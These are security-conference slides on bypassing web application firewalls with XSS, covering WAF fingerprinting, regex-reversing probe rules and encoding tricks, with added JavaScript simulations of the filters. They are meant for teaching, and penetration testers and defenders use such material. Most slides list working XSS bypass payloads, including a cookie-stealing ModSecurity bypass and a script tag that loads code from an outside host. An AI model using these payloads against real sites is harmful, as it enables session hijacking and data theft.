Ranchoddas Series
“Bypassing Modern WAF's Exemplified At XSS” by Rafay Baloch
http://www.rafayhackingarticles.net
Presentation slides of the Garage4Hackers Ranchoddas Webcast Series: "Bypassing Modern WAF's Exemplified At XSS" by Rafay Baloch. Ask all your questions related to the webcast here: http://goo.gl/Vv10hJ. Don't forget to leave your feedback here: https://goo.gl/YrBeic.

1. Ranchoddas Series: "Bypassing Modern WAF's Exemplified At XSS" by Rafay Baloch, http://www.rafayhackingarticles.net
2. Agenda
   • What is a WAF?
   • WAF Primary Operation Models
   • Fingerprinting WAF
   • Automated Fingerprinting
   • WAF Bypass Methodologies
   • Bypassing Keyword Based Filters
   • Entity Decoding
   • Bypassing Real World Filter
   • Comments and Takeaways
3. What/What Not To Expect?
   • The author assumes that the reader has basic knowledge of JavaScript and XSS.
   • This is not a WAF 101 talk; we will not be covering every aspect of WAF bypasses.
   • We will not be disclosing zero-days, but we will show you how to find one.
4. Layers of Insecurity
5. What is a WAF?
   "A WAF may be hardware or software that sits between the client and the web application in order to detect/block malicious requests before they reach the web application."
   Modes:
   • Passive mode (monitor and log only)
   • Reactive mode (block)
6. WAF Primary Operation Models
   • Positive model (whitelist): accept known good
   • Negative model (blacklist): reject known bad
   • Mixed model: a combination of both
7. Secret To WAF Bypass? "All WAFs can be bypassed."
8. Fingerprinting WAF
9. Fingerprinting QWAF
10. WAF Fingerprinting Techniques
   • Cookie values
   • HTTP response codes
   • Connection close
   • Server cloaking
   …
11. Citrix NetScaler [Cookie Values]
12. F5 BIG-IP ASM [Cookie Values]
13. WebKnight [HTTP Response Codes]
14. dotDefender [HTTP Response Codes]
15. Wafw00f
16. Wafw00f Techniques
   • Cookies: keeping track of the cookies the WAF adds to the HTTP exchange.
   • HTTP responses: sending a malicious request and observing the HTTP response code.
   • Dropped packets: noting whether the WAF answers a malicious request by tearing the connection down (FIN or RST) instead of responding.
   • Server cloaking: modifying the URL and other altering methods, such as HTTP response rewriting.
   • Pre-built rules: testing for pre-built negative signatures, which vary from WAF to WAF.
17. Wafw00f [Attack Pattern]
18. Wafw00f Techniques
19. Wafw00f Techniques
20. http-waf-fingerprint Script
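The cookie and status-code checks from slides 10-16, as an added example that is not part of the slides or of wafw00f itself. The signature values (NetScaler `ns_af`/`citrix_ns_id`/`NSC_` cookies, BIG-IP ASM `TS...` cookies, WebKnight's HTTP 999, dotDefender's 403 block page) are assumptions drawn from commonly reported behaviour; confirm them against the current wafw00f plugins before trusting a verdict. All sample responses are constructed.

```javascript
// Added example (not from the slides): passive WAF fingerprinting from one HTTP
// response, in the spirit of wafw00f's cookie and status-code checks.
// SIGNATURE VALUES ARE ASSUMPTIONS; verify against the vendor or wafw00f sources.
const SIGNATURES = [
  { name: "Citrix NetScaler", test: (r) => r.cookies.some((c) => /^(ns_af|citrix_ns_id|NSC_)/.test(c)) },
  { name: "F5 BIG-IP ASM", test: (r) => r.cookies.some((c) => /^TS[0-9a-z]{3,8}=/i.test(c)) },
  { name: "AQTRONIX WebKnight", test: (r) => r.status === 999 },
  { name: "dotDefender", test: (r) => r.status === 403 && /dotDefender Blocked Your Request/i.test(r.body) },
];

// Minimal HTTP/1.x response parser: status line, headers (Set-Cookie kept separately), body.
function parseResponse(raw) {
  const sep = raw.indexOf("\r\n\r\n");
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const body = sep === -1 ? "" : raw.slice(sep + 4);
  const lines = head.split("\r\n");
  const status = parseInt(lines[0].split(" ")[1], 10);
  const headers = {};
  const cookies = [];
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i === -1) continue;
    const name = line.slice(0, i).trim().toLowerCase();
    const value = line.slice(i + 1).trim();
    if (name === "set-cookie") cookies.push(value);
    else headers[name] = value;
  }
  return { status, headers, cookies, body };
}

// Names of every signature the response matches (possibly none).
function fingerprint(raw) {
  const r = parseResponse(raw);
  return SIGNATURES.filter((s) => s.test(r)).map((s) => s.name);
}

// Constructed sample responses, not captured from real appliances.
const SAMPLES = {
  netscaler: "HTTP/1.1 200 OK\r\nSet-Cookie: ns_af=0123abcd; Path=/\r\nContent-Type: text/html\r\n\r\n<html>ok</html>",
  bigip: "HTTP/1.1 200 OK\r\nSet-Cookie: TS01a2b3c4=0123456789abcdef; Path=/\r\n\r\n<html>ok</html>",
  webknight: "HTTP/1.1 999 No Hacking\r\nContent-Type: text/html\r\n\r\n<h1>No Hacking</h1>",
  dotdefender: "HTTP/1.1 403 Forbidden\r\nContent-Type: text/html\r\n\r\n<title>dotDefender Blocked Your Request</title>",
  origin: "HTTP/1.1 200 OK\r\nSet-Cookie: session=abc; Path=/\r\n\r\n<html>ok</html>",
};

for (const [label, raw] of Object.entries(SAMPLES)) {
  console.log(label.padEnd(12), fingerprint(raw).join(", ") || "(no WAF signature)");
}
```

Run `fingerprint` on the response to a benign request and on the response to an obviously malicious probe (for example `?q=<script>alert(1)</script>`): several products only reveal themselves on the block path, which is exactly why wafw00f sends both.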
21. WAF Bypass Methodologies
   • Brute forcing: throwing random payloads and hoping one of them executes.
   • Regular expression reversing: taking note of what is blocked and what is not in order to construct a bypass.
   • Browser bugs: utilizing known/unknown browser bugs in order to construct a bypass.
22. Brute Forcing
   <dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>
   <iframe/src="data:text/html,<svg%0A%0B%0C%0D%A0%00%20onload=confirm(1);>";>
   <svg%09%0A%0C%0D%20onload=confirm(1);>
   <svg////////onload=confirm(1);>
   <video src=_ onloadstart="alert(1)">
23. Brute Forcing
   <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
   <input type="text" value=""onresize=prompt(1) "> // IE 10 docmode
   <a href="javascript:alert(1)">CLICK ME</a>
24. Brute Forcing
   <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> // Chrome
   <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
25. Regular Expression Reversing
   • In the author's experience the most reliable way of bypassing a WAF (the slide claims a 98% success rate).
   • WAF rules are mostly made up of regular expressions.
   • In regex reversing, we identify all the variations of malicious input the WAF is blocking.
   • Hence we also know what it is not blocking, and based upon that we construct a bypass.
26. Rule 1: Injecting Harmless HTML
   Rule 1: Inject harmless HTML tags such as <b>, <i>, <u>.
   Take note of the following:
   • Are < and > being HTML-encoded or stripped?
   • Are both < and > stripped, or only one of them?
27. Rule 2: Injecting HTML Entities
   Rule 2: Inject HTML entities to check whether the filter decodes any entities before matching.
   Injecting HTML entities and JavaScript escapes:
   &lt;b&gt;
   \u003cb\u003e
   \x3cb\x3e
28. Rule 3: Injecting Script Tag
   Rule 3: Inject the script tag and its variations to construct a bypass.
   <sCRiPt>alert(1);</sCRipT> // Test whether the filter only blocks lowercase
   <SCriPt>delete alert;alert(1)</sCriPt>
   <script%20src="//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1"></script>
29. Rule 3: Injecting Script Tag
   <svg><script>alert&grave;1&grave;<p> // ES6 template literal; inside <svg> the HTML parser decodes the entities before the script runs
   <svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p> // ES6 variation
   <svg><script>alert`1` // ES6 variation
   <script
   >confirm(1);</script> // Injecting a newline inside the opening tag
30. Rule 4: Testing For Recursive Filters
   Rule 4: Test whether the filter removes blocked tags in a single, non-recursive pass.
   If our input <script>alert(1);</script> comes back as alert(1) in the response body, the tag was stripped, so we inject:
   <scr<script>ipt>alert(1);</scr</script>ipt>
   <scr<iframe>ipt>alert(1);</scr</iframe>ipt>
   Stripping the inner tag once leaves:
   <script>alert(1);</script>
31. Rule 5: Injecting Anchor Tag
   Rule 5: Inject the anchor tag and its variants to check for potential bypasses.
   Injecting:
   <a href="http://www.google.com">Clickme</a>
   Take note of the following:
   • Was the <a> tag stripped out completely?
   • Was the href attribute stripped out?
32. Rule 5: Injecting Anchor Tag
   Injecting:
   <a href="javascript:">Clickme</a>
   <a href="javaScrRipt:alert(1)">Clickme</a>
   Take note of the following:
   • Was the whole javascript keyword stripped?
   • Was the ":" stripped?
   • Was the alert keyword stripped?
   • Were the parentheses stripped?
33. Rule 5: Injecting Anchor Tag
   <a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:confirm&lpar;1&rpar;">Click<test>
   <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;confirm&lpar;1&rpar;">Click<test>
34. Rule 5: Injecting Anchor Tag
   <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;1&rpar;">Click<test>
   <a href='javascript:http://@cc_on/confirm%28location%29'>click</a>
35. Rule 6: Testing For Event Handlers
   Rule 6: Inject event handlers to see whether a bypass is possible (with user interaction).
   Injecting:
   <a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
   Take note of the following:
   • If the made-up onclimbatree handler gets stripped, the filter is blocking every on*= attribute generically; if not, we can try injecting less common event handlers.
36. Rule 7: Input Less Common Event Handlers
   Rule 7: Inject less common event handlers along with other HTML tags.
   Injecting:
   <form oninput=alert(1)><input></form>
   <q/oncut=alert(1)>
   <body/onhashchange=alert(1)><a href=#>clickit
   --><d/ /ondrag=co\u006efir\u006d(2)>hello.
37. Rule 8: Testing With SRC Attribute
   Rule 8: Inject payloads that use the src attribute to execute JavaScript; note whether the src attribute itself is being blocked or the tag.
   Injecting:
   <img src=x onerror=prompt(1);>
   <img/src=aaa.jpg onerror=prompt(1);>
   <video src=x onerror=prompt(1);>
   <audio src=x onerror=prompt(1);>
   <iframe src=x onerror=prompt(1)>
   <embed/src=//goo.gl/nlX0P>
38. Rule 9: Testing With action Attribute
   Rule 9: Inject payloads that use the action attribute to execute JavaScript; note whether the action attribute itself is being blocked or the tag.
   Injecting:
   <form action="Javascript:alert(1)"><input type=submit>
   <isindex action="javascript:alert(1)" type=image>
   <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
39. Rule 9: Testing With action Attribute
   Injecting:
   <isindex x="javascript:" onmouseover="alert(1)" label="test"> // Giuseppe Trotta
   <form/action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK // .mario
   <button form=x>xss<form id=x action="javas&Tab;cript:alert(1)">
40. Rule 10: Injecting HTML5 Based Payloads
   Rule 10: Many firewalls are not tuned to filter HTML5 tags and attributes, so the following payloads can come in very handy when attempting a bypass.
   Injecting:
   <marquee/onstart=confirm(2)>/
   <body onload=prompt(1);>
   <select autofocus onfocus=alert(1)>
   <textarea autofocus onfocus=alert(1)>
   <keygen autofocus onfocus=alert(1)>
   <video><source onerror="javascript:alert(1)">
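Rules 1-10 are one procedure: send a probe, note what the filter did, and derive the next probe. The harness below is an added example, not code from the slides, and `toyWaf` is a filter constructed for the example with the classic holes those rules hunt for (single-pass stripping, a fixed event-handler list, literal matching without entity decoding); it is not any vendor's rule set.

```javascript
// Added example (not from the slides): a probe harness for Rules 1-10 run against a
// CONSTRUCTED blacklist filter. The filter is deliberately weak so that each rule
// has something to find.
function toyWaf(input) {
  // Hole A: a blocked tag is removed in one pass, so the filter is not recursive.
  let out = input.replace(/<\/?script[^>]*>/gi, "");
  // Hole B: only a fixed list of well-known event handlers is rejected.
  if (/\bon(load|error|click|mouseover)\s*=/i.test(out)) return { blocked: true, output: "" };
  // Hole C: the scheme is matched literally, with no entity decoding first.
  if (/javascript:/i.test(out)) return { blocked: true, output: "" };
  return { blocked: false, output: out };
}

// One probe per rule; the note says what the outcome tells the tester.
const PROBES = [
  { rule: 1, payload: "<b>harmless</b>", note: "are < and > encoded or stripped?" },
  { rule: 2, payload: "&lt;b&gt;", note: "are entities decoded before matching?" },
  { rule: 3, payload: "<sCRiPt>alert(1);</sCRipT>", note: "is matching case-insensitive?" },
  { rule: 4, payload: "<scr<script>ipt>alert(1);</scr</script>ipt>", note: "is stripping recursive?" },
  { rule: 5, payload: '<a href="javascript:alert(1)">Clickme</a>', note: "is the scheme keyword blocked?" },
  { rule: 5, payload: '<a href="j&Tab;avascript:alert(1)">Clickme</a>', note: "is the scheme decoded first?" },
  { rule: 6, payload: '<a href="#" onclimbatree=alert(1)>x</a>', note: "are all on*= handlers blocked?" },
  { rule: 7, payload: "<body onhashchange=alert(1)>", note: "less common handler" },
  { rule: 8, payload: "<img src=x onerror=alert(1)>", note: "common src/onerror combination" },
  { rule: 9, payload: '<form action="javascript:alert(1)"><input type=submit>', note: "action attribute" },
  { rule: 10, payload: "<select autofocus onfocus=alert(1)>", note: "HTML5 autofocus" },
];

// Run every probe and classify the outcome the way an analyst would note it down.
function runProbes(filter, probes = PROBES) {
  return probes.map((p) => {
    const r = filter(p.payload);
    const verdict = r.blocked ? "blocked" : r.output === p.payload ? "passed untouched" : "modified";
    return { rule: p.rule, payload: p.payload, verdict, output: r.output, note: p.note };
  });
}

// The Rule 4 observation: does stripping once turn a broken tag into the real one?
function survivesStrip(filter, payload, target) {
  const r = filter(payload);
  return !r.blocked && r.output.includes(target);
}

// What closes Hole A: repeat until nothing changes. (Stripping is still the wrong
// control; contextual output encoding is the real fix, as the Conclusion slide says.)
function stripRecursively(input, re) {
  let prev;
  do {
    prev = input;
    input = input.replace(re, "");
  } while (input !== prev);
  return input;
}

for (const r of runProbes(toyWaf)) {
  console.log(`Rule ${String(r.rule).padStart(2)} | ${r.verdict.padEnd(16)} | ${r.payload}`);
}
```

Reading the table is the "reversing" step: Rule 4 comes back as a complete `<script>` tag, Rule 5 passes once the scheme is entity-obfuscated, and the made-up `onclimbatree` handler survives, which together say the filter is a short literal blacklist rather than a generic `on\w+=` or entity-aware rule.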
41. Exotic XSS Vectors
   <svg><use xlink:href="data:image&sol;svg&plus;xml&semi;ba&NewLine;se&Tab;64&semi;&yaXB0OmFsZXJ0KGxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zdmc+#rectangle" /></svg> // Alex Inführ
   <body/onactivate=URL=name//
   <svg><div onactivate=alert('Xss') id=xss style=overflow:scroll> // IE 7-11, Ben Hayak
42. Exotic XSS Vectors
   <div onfocus=alert('xx') id=xss style=display:table> // IE 7-11, Ben Hayak
   <div style=overflow:-webkit-marquee onscroll=alert(1)> // Masato Kinugawa
   <anything onbeforescriptexecute=confirm(1)> // .mario
43. Bypassing Keyword Based Filters
   • Many firewalls focus on blocking keywords such as alert, confirm and prompt in order to stop script execution.
   • In that case we can use techniques such as character escapes, string concatenation and non-alphanumeric JavaScript to bypass the filter.
44. Character Escapes
   Variations for alert(1):
   <script>\u0061\u006C\u0065\u0072\u0074(1)</script> // Unicode escapes
   <script>\u0061\u006C\u0065\u0072\u0074`1`</script> // ES6 variation
45. Character Escapes
   Variations for alert(1):
   <script>eval("\x61\x6c\x65\x72\x74(1)");</script> // Hexadecimal escapes using eval
   <script>eval("\141\154\145\162\164`1`")</script> // Octal escapes combined with ES6
46. String Concatenation
47. Alternative Execution Sinks
   <script>setTimeout("a" + "lert" + "(1)");</script> // Using basic concatenation
   <img src=a onerror=setInterval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using String.fromCharCode; the codes spell alert('xss')
   <script>setTimeout(/a/.source + /lert/.source + "(1)");</script> // Using the source property for concatenation
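The variants from slides 43-47 run against a keyword blacklist and then actually executed, as an added example that is not part of the slides. `alert()` does not exist outside a browser, so a stub records the calls; `Function(src)` stands in for the browser executing an inline script, and because `setTimeout("string")` is browser-only, the concatenation variants feed `Function()` directly (an assumption made for this example, not a change to the slides' payloads).

```javascript
// Added example (not from the slides): alert(1) variants versus a keyword blacklist,
// then executed to prove they still reach alert(). Node.js has no alert(), so a
// stub is installed on globalThis; Function(src) models inline-script execution.
function keywordFilter(src) {
  return /\b(alert|confirm|prompt)\b/i.test(src); // true means "blocked"
}

const alertCalls = [];
globalThis.alert = (x) => { alertCalls.push(x); };

// Each value is JavaScript source exactly as it would appear inside a <script> block.
const VARIANTS = {
  plain: "alert(1)",
  unicodeEscapes: "\\u0061\\u006C\\u0065\\u0072\\u0074(1)",
  unicodeTemplate: "\\u0061\\u006C\\u0065\\u0072\\u0074`1`",
  hexEval: 'eval("\\x61\\x6c\\x65\\x72\\x74(1)")',
  octalEval: 'eval("\\141\\154\\145\\162\\164`1`")',
  concatenation: 'Function("a" + "lert" + "(1)")()',
  regexSource: 'Function(/a/.source + /lert/.source + "(1)")()',
  fromCharCode: "Function(String['fromCharCode'](97,108,101,114,116,40,49,41))()",
};

// Execute one variant the way an injected inline script would run; report whether alert fired.
function fires(src) {
  alertCalls.length = 0;
  Function(src)(); // sloppy-mode function, so the legacy octal escapes are accepted
  return alertCalls.length > 0;
}

// For every variant: did the blacklist stop it, and does it still call alert()?
function report() {
  const out = {};
  for (const [name, src] of Object.entries(VARIANTS)) {
    out[name] = { blocked: keywordFilter(src), fires: fires(src) };
  }
  return out;
}

for (const [name, r] of Object.entries(report())) {
  console.log(name.padEnd(16), r.blocked ? "BLOCKED" : "passes ", r.fires ? "alert fired" : "no alert");
}
```

Every variant except `plain` passes the blacklist and still calls `alert`, which is the point of slide 43: a longer keyword list cannot win, because the identifier can be spelled an unbounded number of ways before the engine ever sees the word.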
48. Entity Decoding
   Input supplied:
   <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Click Here</a>
   Response:
   <a href="javascript:confirm(1)">Clickhere</a>
49. Entity Decoding
   Input supplied (double encoding):
   <a href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>
50. Entity Decoding
   Response (the application decoded one layer; the browser decodes the remaining layer when it reads the href):
   <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
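The double-encoding sequence from slides 48-50 replayed end to end, as an added example that is not part of the slides. The filter, the reflecting application and the browser-side attribute decoding are all simulated here (assumptions for the example): the filter decodes numeric character references once and then matches, the application decodes once and reflects into `href`, and the browser decodes the attribute value once more, as the HTML parser does.

```javascript
// Added example (not from the slides): double-encoded numeric entities against a
// filter that normalises exactly once. Everything below is a simulation.
function encodeNumericEntities(s) {
  // No trailing semicolons, exactly as on the slides; browsers still decode these.
  return [...s].map((ch) => "&#" + ch.codePointAt(0)).join("");
}

// Decode &#NNN / &#xHH with or without the trailing ';'. One pass only.
function decodeOnce(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, ref) =>
    String.fromCodePoint(ref[0].toLowerCase() === "x" ? parseInt(ref.slice(1), 16) : parseInt(ref, 10)));
}

// Weak filter: normalise once, then match.
function singleDecodeFilter(input) { return /javascript:/i.test(decodeOnce(input)); }

// Stronger filter: normalise until the input stops changing, then match.
function fullDecodeFilter(input) {
  let prev, cur = input;
  do { prev = cur; cur = decodeOnce(cur); } while (cur !== prev);
  return /javascript:/i.test(cur);
}

// The chain on the slides: filter -> application (decodes once, reflects) -> browser (decodes once more).
function pipeline(input, filter = singleDecodeFilter) {
  if (filter(input)) return { blocked: true };
  const reflected = decodeOnce(input);
  return {
    blocked: false,
    response: `<a href="${reflected}">Clickhere</a>`,
    hrefInBrowser: decodeOnce(reflected),
  };
}

const PAYLOAD = "javascript:confirm(1)";
const SINGLE = encodeNumericEntities(PAYLOAD); // &#106&#97&#118...  (slide 48)
const DOUBLE = encodeNumericEntities(SINGLE);  // &#38&#35&#49&#48&#54... (slide 49)

console.log("single-encoded:", pipeline(SINGLE));
console.log("double-encoded:", pipeline(DOUBLE));
console.log("double-encoded, full decode first:", pipeline(DOUBLE, fullDecodeFilter));
```

With single encoding the filter sees `javascript:` and blocks; with double encoding the filter sees only `&#106&#97...`, the application emits the slide-50 response, and the browser's own decoding pass produces the scheme. `fullDecodeFilter` closes the gap for this encoding, though the durable fix remains validating the decoded URL scheme in the application rather than pattern-matching upstream.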
51. Bypassing Real World Filter
   Demo: https://hack.me/101575/bypass-blacklist-based-waf-challenge.html
52. Browser Based Bugs
   • Browser bugs are one of the last options, if the first two approaches fail.
   • Most effective when it comes to bypassing WAFs and any other client-side filters.
   • Browser bugs mostly exist in the form of parsing bugs, charset bugs, or abuse of client-side filters in order to execute JavaScript.
53. Null Bytes
   Internet Explorer up to version 9 ignores null bytes. Many firewalls are still vulnerable to this attack vector.
   <sc\x00ript>alert(1);</s\x00cript>
54. Unicode Separators
   (?i)([\s"'`;/0-9=]+on\w+\s*=)
55. Unicode Separators
   • There are characters which browsers treat as whitespace.
   • The \s meta-character does not cover all of these control characters.
   Bypass for ModSecurity (IE9):
   <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>
   (The \x escapes spell javaSCRIPT&colon;confirm&lpar;document.cookie&rpar;; %0B is the vertical tab, one of the characters the rule's \s does not cover.)
56. Unicode Separators
   • Security researcher Masato Kinugawa has fuzzed the control characters that browsers treat as whitespace in this position:
   IExplorer = [0x09,0x0B,0x0C,0x20,0x3B]
   Chrome    = [0x09,0x20,0x28,0x2C,0x3B]
   Safari    = [0x2C,0x3B]
   FireFox   = [0x09,0x20,0x28,0x2C,0x3B]
   Opera     = [0x09,0x20,0x2C,0x3B]
   Android   = [0x09,0x20,0x28,0x2C,0x3B]
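The rule on slide 54 tested against the separator table on slide 56, as an added example that is not part of the slides. ModSecurity ran on PCRE, and PCRE before 8.34 did not include the vertical tab (0x0B) in `\s`, so `LEGACY_RULE` spells that older whitespace set out explicitly instead of using JavaScript's `\s` (which does match 0x0B and would hide the IE9 bypass); `MODERN_RULE` is the same rule with today's `\s`. Which PCRE version a given ModSecurity deployment actually ran is an assumption to verify per target.

```javascript
// Added example (not from the slides): which browser-accepted separators slip past the
// ModSecurity-style event-handler rule, for an old PCRE \s and for a modern one.
const LEGACY_WS = " \\t\\n\\r\\f"; // PCRE < 8.34: space, tab, LF, CR, FF (no vertical tab)
const LEGACY_RULE = new RegExp("([" + LEGACY_WS + "\"'`;/0-9=]+on\\w+[" + LEGACY_WS + "]*=)", "i");
const MODERN_RULE = /([\s"'`;/0-9=]+on\w+\s*=)/i; // same rule, \s that includes 0x0B

// Characters each browser accepts between an attribute name and "=" (slide 56).
const BROWSER_SEPARATORS = {
  IExplorer: [0x09, 0x0b, 0x0c, 0x20, 0x3b],
  Chrome: [0x09, 0x20, 0x28, 0x2c, 0x3b],
  Safari: [0x2c, 0x3b],
  FireFox: [0x09, 0x20, 0x28, 0x2c, 0x3b],
  Opera: [0x09, 0x20, 0x2c, 0x3b],
  Android: [0x09, 0x20, 0x28, 0x2c, 0x3b],
};

// The slide's bypass shape: <a onmouseover<SEP>=...>, with an ordinary space before "on".
function payloadWith(sep) {
  return "<a onmouseover" + String.fromCharCode(sep) + "=alert(1)>click</a>";
}

// Separators the browser accepts but the rule does not match: each one is a bypass.
function bypasses(browser, rule) {
  return BROWSER_SEPARATORS[browser].filter((sep) => !rule.test(payloadWith(sep)));
}

const hex = (list) => list.map((b) => "0x" + b.toString(16).padStart(2, "0").toUpperCase());
for (const browser of Object.keys(BROWSER_SEPARATORS)) {
  console.log(
    browser.padEnd(10),
    "legacy \\s:", hex(bypasses(browser, LEGACY_RULE)).join(",") || "-",
    " modern \\s:", hex(bypasses(browser, MODERN_RULE)).join(",") || "-",
  );
}
```

Under the legacy `\s`, IE's 0x0B (the slide's `%0B`) is a bypass; fixing `\s` removes it but leaves 0x3B, 0x28 and 0x2C, which no whitespace class will ever cover. The lasting fix is matching `on\w+` followed by any non-identifier character, or better, not relying on the separator at all.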
57. Charset Inheritance Bugs
   • There are multiple encoding systems for the web; this is required to ensure that a communication follows some "rules".
   • A charset is the set of characters allowed in a specific encoding system.
   • Currently UTF-8 contains the largest set of characters, which is why it is so widely used.
   • In a charset inheritance vulnerability, a document that declares no charset inherits one from another origin (for example the page that frames it), so the attacker chooses how its bytes are decoded.
58. UTF-32 Based XSS
59. UTF-32 XSS
   • IE does not support the UTF-32 charset.
   • IE ignores null bytes up to version 9.
   • In UTF-32, every character is encoded as 4 bytes (32 bits).
   Vector sent:
   ∀㸀㰀script㸀alert(1)㰀/script㸀
60. UTF-32 XSS
   ∀ U+2200 = [0x00][0x00][0x22][0x00]
   㸀 U+3E00 = [0x00][0x00][0x3E][0x00]
   㰀 U+3C00 = [0x00][0x00][0x3C][0x00]
   With the null bytes ignored, this is equivalent to:
   "><script>alert(1)</script>
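The UTF-32 vector from slides 59-60 and the null-byte vector from slide 53 shown as bytes, as an added example that is not part of the slides. The big-endian layout matches the `[0x00][0x00][0x22][0x00]` rows on the slide; `nullIgnoringParse` models the IE 9-and-earlier behaviour the slides describe and is a simulation, not the browser. That a signature engine inspects the UTF-8 form of the request is an assumption for the example.

```javascript
// Added example (not from the slides): what the UTF-32 and null-byte vectors look like
// on the wire, and what a parser that drops 0x00 reconstructs from them.
const UTF32_VECTOR = "\u2200\u3E00\u3C00script\u3E00alert(1)\u3C00/script\u3E00";
const NULL_VECTOR = "<sc\u0000ript>alert(1);</s\u0000cript>";

// UTF-32BE: four bytes per code point, most significant byte first (as on slide 60).
function utf32be(s) {
  const out = [];
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    out.push((cp >>> 24) & 0xff, (cp >>> 16) & 0xff, (cp >>> 8) & 0xff, cp & 0xff);
  }
  return Uint8Array.from(out);
}

// What a signature engine sees if it inspects the UTF-8 form of the same text.
function utf8(s) { return new TextEncoder().encode(s); }

function hasAngleBrackets(bytes) {
  return Array.from(bytes).some((b) => b === 0x3c || b === 0x3e);
}

// A parser that ignores 0x00 and reads the remaining bytes one character each.
function nullIgnoringParse(bytes) {
  return Array.from(bytes).filter((b) => b !== 0).map((b) => String.fromCharCode(b)).join("");
}

// A naive signature, to show it misses the null-byte form and hits the reconstructed one.
function looksLikeScriptTag(s) { return /<script/i.test(s); }

const hexdump = (bytes) => Array.from(bytes).map((b) => b.toString(16).padStart(2, "0")).join(" ");
console.log("UTF-8 bytes on the wire :", hexdump(utf8(UTF32_VECTOR)));
console.log("UTF-32BE bytes          :", hexdump(utf32be(UTF32_VECTOR)));
console.log("after dropping nulls    :", nullIgnoringParse(utf32be(UTF32_VECTOR)));
console.log("null-byte vector        :", JSON.stringify(NULL_VECTOR), "->", nullIgnoringParse(utf8(NULL_VECTOR)));
```

The UTF-8 form of the vector contains no `<` or `>` byte at all, so a byte-oriented signature has nothing to match, while the null-stripped UTF-32 reading is exactly the `"><script>alert(1)</script>` string on slide 60. The defence is to decode with the charset the page actually declares before matching, and to declare one.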
62. Conclusion
   • Blacklisting will only buy you time; it will not prevent attacks.
   • Secure coding practices (input validation, source code analysis, pentesting, etc.) belong in the development phase.
   • We have to try many permutations/combinations before getting to a bypass.
